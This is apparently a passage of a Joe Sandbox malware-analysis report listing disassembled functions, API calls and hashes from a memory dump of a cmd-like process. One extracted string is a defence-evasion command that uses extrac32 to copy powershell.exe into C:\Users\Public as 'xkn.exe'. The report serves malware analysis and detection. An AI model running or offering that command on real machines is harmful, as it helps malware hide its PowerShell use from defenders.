                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$wcschr$Process$AllocateFree_setjmp_wcsuprmemsetwcscmp
                                                                                                                    • String ID: FOR$ IF
                                                                                                                    • API String ID: 557945885-2924197646
                                                                                                                    • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                                                    • Instruction ID: 9d7bd50e53cce0e2e9e577b5bd62e5e80c7115c79b2af122b9cb92195f6da429
                                                                                                                    • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                                                    • Instruction Fuzzy Hash: 83519120B0965A82FE54BF159418179AEB1FF85FA6FE84634D91E477D1DE3CE901C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCF173 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 119COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: iswdigit$iswspacewcschr
                                                                                                                    • String ID: )$=,;
                                                                                                                    • API String ID: 1959970872-2167043656
                                                                                                                    • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                                    • Instruction ID: 72916209d4e65f0a94964b347f97071e0be2377ba7cae6a09aafa2dc1c91a318
                                                                                                                    • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                                    • Instruction Fuzzy Hash: 11417F65E0825A85FB646F15E558379FAB0BF50FABFE45076CA8D421A0DF3CA441C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BEBA40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                                                                    • String ID: %04X-%04X$:
                                                                                                                    • API String ID: 930873262-1938371929
                                                                                                                    • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                    • Instruction ID: 987e320783ec34387ee0c211e347fd015ad4fd4f9941b4e9560be08a93d5f1c2
                                                                                                                    • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                    • Instruction Fuzzy Hash: 5E417C21A0CA8AC2EB60AF61E4502BAFAB5FB84B56FE04135DA4E426C5DF3DD544C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD36EC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                                                    • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                    • API String ID: 3249344982-2616576482
                                                                                                                    • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                    • Instruction ID: e05ed1e9b0d306c41e542908a96debe3902c02e50c622f39b299e96652b70643
                                                                                                                    • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                    • Instruction Fuzzy Hash: 36413C72A18A4586F3509F12E848769EAB4FB89FDAF949234DA4E07794DF3CD054CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD6A28 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$iswdigit
                                                                                                                    • String ID: +-~!$<>+-*/%()|^&=,
                                                                                                                    • API String ID: 2770779731-632268628
                                                                                                                    • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                                    • Instruction ID: df34de3fc4468446fb830bcdb7bf00a112f6337bb3878cfdd0e37d3c24870b52
                                                                                                                    • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                                    • Instruction Fuzzy Hash: 5A31EC32609F5AC5EA50AF11E454279BFB0FB49F86BA58135EA4E43354EF3CE404C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BED878 Relevance: 12.1, APIs: 8, Instructions: 89fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3192234081-0
                                                                                                                    • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                                    • Instruction ID: fa9530698bebe07d27cb23da3242631b38e6653748d95fde44c99cc97ef18300
                                                                                                                    • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                                    • Instruction Fuzzy Hash: F631AD35A086868BE714AF21E80427DFFA0FB89F96FA09634DE4A47795DE3CD401CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD1630 Relevance: 10.7, APIs: 7, Instructions: 208memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF789BD14D6,?,?,?,00007FF789BCAA22,?,?,?,00007FF789BC847E), ref: 00007FF789BD1673
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF789BD14D6,?,?,?,00007FF789BCAA22,?,?,?,00007FF789BC847E), ref: 00007FF789BD168D
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF789BD14D6,?,?,?,00007FF789BCAA22,?,?,?,00007FF789BC847E), ref: 00007FF789BD1757
                                                                                                                    • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF789BD14D6,?,?,?,00007FF789BCAA22,?,?,?,00007FF789BC847E), ref: 00007FF789BD176E
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF789BD14D6,?,?,?,00007FF789BCAA22,?,?,?,00007FF789BC847E), ref: 00007FF789BD1788
                                                                                                                    • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF789BD14D6,?,?,?,00007FF789BCAA22,?,?,?,00007FF789BC847E), ref: 00007FF789BD179C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$Process$Alloc$Size
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3586862581-0
                                                                                                                    • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                                    • Instruction ID: 56e892b6d7901b216f60635b3cdf219a5eae635652501a2592727b73aa0c53b4
                                                                                                                    • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                                    • Instruction Fuzzy Hash: 56916065A0974A82EA54AF15E448278FAB0FB44F96FA98135DA4D07BE0EF3DE445C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD86F0 Relevance: 10.7, APIs: 7, Instructions: 154COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1313749407-0
                                                                                                                    • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                                    • Instruction ID: 09392f7bbeb452ea1877d56a8684b0c8022e84669c73cc8794654376f6eb8bdb
                                                                                                                    • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                                    • Instruction Fuzzy Hash: 7A51B361A0968A52EA54BF159818179EEB5FF85F93FA84234DE1E077D1EF3CE841C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BEEC14 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 920682188-0
                                                                                                                    • Opcode ID: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
                                                                                                                    • Instruction ID: 0bef936b73528942f5b8982aff79263079ac42c7e17d92e1d195d26b1d8bc94f
                                                                                                                    • Opcode Fuzzy Hash: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
                                                                                                                    • Instruction Fuzzy Hash: 3D516B32705B858AEB25EF21D8542E8BBB5FB88B86F948035CA4D47754EF3CD645C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCDF60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    • extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe , xrefs: 00007FF789BCE00B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$FreeProcess_setjmp
                                                                                                                    • String ID: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
                                                                                                                    • API String ID: 777023205-4044220184
                                                                                                                    • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                                    • Instruction ID: 13b70ef18cf0117297ae03081c3968ee21bcb362160e95bebf3f6c53788de3a9
                                                                                                                    • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                                    • Instruction Fuzzy Hash: 7851393090DA86CAF690AF22E845179FAB4BF84F66FF44435D54D427A1DE3EA841C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCF5D7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: iswdigit$iswspacewcschr
                                                                                                                    • String ID: )$=,;
                                                                                                                    • API String ID: 1959970872-2167043656
                                                                                                                    • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                                                    • Instruction ID: d03cb7889527400858b9b2eaf56293869ff79451347d70d63488c7fa10b4111f
                                                                                                                    • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                                                    • Instruction Fuzzy Hash: BE417964E0825B96FBA46F11E558379BEB0BF10FABFF45076C98D421A0DF3CA441C620
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BE91B8 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsnicmpfprintfwcsrchr
                                                                                                                    • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                    • API String ID: 3625580822-2781220306
                                                                                                                    • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                                                    • Instruction ID: 4c6029e906d4730484052e80e0691112b97067f7d5ea310bf8e0653317e7df1d
                                                                                                                    • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                                                    • Instruction Fuzzy Hash: 69319221A0964A81EE18BF82A5001BDFB74FF45F96FA45134DD1D17795EE3CE489C310
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD1FAC Relevance: 9.3, APIs: 6, Instructions: 260COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memsetwcsspn
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3809306610-0
                                                                                                                    • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                                                    • Instruction ID: 049c15574a5048d04e121039e51e015066979a888249c3b868b2f123ddbafdc0
                                                                                                                    • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                                                    • Instruction Fuzzy Hash: 04B1B171A08B8A86EA50EF55E454279EBB0FB85F92FE48031DA4D47790DF7DE841C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BE8C18 Relevance: 9.1, APIs: 6, Instructions: 145COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
